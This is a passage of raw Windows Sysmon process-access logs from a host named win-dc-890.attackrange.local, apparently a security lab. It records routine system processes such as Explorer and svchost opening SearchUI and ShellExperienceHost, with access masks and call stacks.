07:51:25.611{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.595{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.595{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.595{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0D00-00000000CF01}9007932C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0D00-00000000CF01}9007932C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0D00-00000000CF01}9007932C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0D00-00000000CF01}9007932C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0D00-00000000CF01}9007932C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0D00-00000000CF01}9007932C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+